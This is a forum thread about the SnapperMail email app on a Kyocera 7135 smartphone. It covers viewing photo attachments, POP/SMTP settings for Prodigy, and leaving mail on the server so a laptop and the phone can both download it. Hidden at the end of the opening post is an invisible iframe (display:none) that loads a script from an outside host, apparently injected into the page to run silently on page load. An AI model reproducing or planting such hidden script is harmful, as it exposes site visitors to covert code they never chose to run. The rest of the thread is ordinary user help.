+ Reply to Thread

Thread: Snappermail

Snappermail

If I were to use snapper mail, and if a individuals email that was sent to me included a photo in the email, would I be able to view the photos, or do they need to be an attachment.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

The photo needs to be an attachment. Plus, if you intend on viewing it on the 7135, you need to have a viewer program like AcidImage.
    Michael

Snappermail includes a viewer...

called JpegWatch Lite. It opens attached jpeg files nicely. But I don't know if it works on other picture attachment formats.

they need to be attatchments and you need to have enogh free memory on the handheld to download them,then you can save them to the external card and store them there or view them with jpegwatch light,you can then reattach them with snappermail and email them to someone else
    B.Andrew "Andy" Brown,MSW
    Executive Director,Camp Livingston.Inc

Snappermail

Sorry this post is so basic (I am a definitely newbie in this area) but I just installed this app and am struggling with server settings and concepts. I can send but can't receive emails. Would appreciate any ideas or point me in the right direction. I called Verizon and Prodigy and searched this site but issue not resolved.

I have 7135, Verizon EN , leave my lap top on all the time on Comcast (so emails download to lapptop), also use Prodigy/SBC for my email account and ISP for traveling. Anyway my settings for Prodigy/SBC are:
    Pop Server: pop.prodigy.yahoo.com
    SMTP Server: Smtp.prodigy.yahoo.com
    both with my email address and password filled in.

Also the idea that one can get emails to both your laptop and and limited versions to the 7135 and then request a larger version of the same email on the 7135 from the server before deleting is new to me. Might I need a special ISP server to do this?
    RayB

I have the same problems with prodigy. Have you fixed it yet?

Re: Snappermail

Originally posted by rjblake
    ...I can send but can't receive emails.

...leave my lap top on all the time on Comcast (so emails download to lapptop),
    I think that might be your problem. Most POP email clients (Outlook and Outlook Express are most likely the one used in a case like yours) are set by default to delete mail from the server once it is downloaded. SO, once your laptop has downloaded the message, it no longer exists on the server for you to be able to get it any other way.

Also the idea that one can get emails to both your laptop and and limited versions to the 7135 and then request a larger version of the same email on the 7135 from the server before deleting is new to me. Might I need a special ISP server to do this?
    No special ISP or server is needed, just look through the help files on your email program on your laptop and find out what is necessary to leave a copy of message on the mail server. Usually, you can set this so it leaves them there for a specified period of time before deleting them (one week, for example). This allows you time to access them or download them somewhere else such as your smartphone using SnapperMail, but still cleans them off the mail server regularly so that you don't go past your storage limit on your mailbox.

BTW, SnapperMail also has the feature to delete messages from the server or leave them there, so make sure it is set to always leave messages on the server, so they don't get deleted before you can download them to your laptop. (When you are editing the POP3 account, look at the Fetch "tab" and there is a "Delete Options" Button. Uncheck all the boxes there to be safe, for now until you fully understand what they do adn how you want them set.)
    Nationwide Free and Clear Plan, w/ 2 lines, unlimited LD, Unlimited PCS to PCS, unlimited nights and weekends, unlimited Vision, Equipment replacement on both lines, roadside assistance, and 2000 anytime minutes. About $98/month after discounts and taxes are included.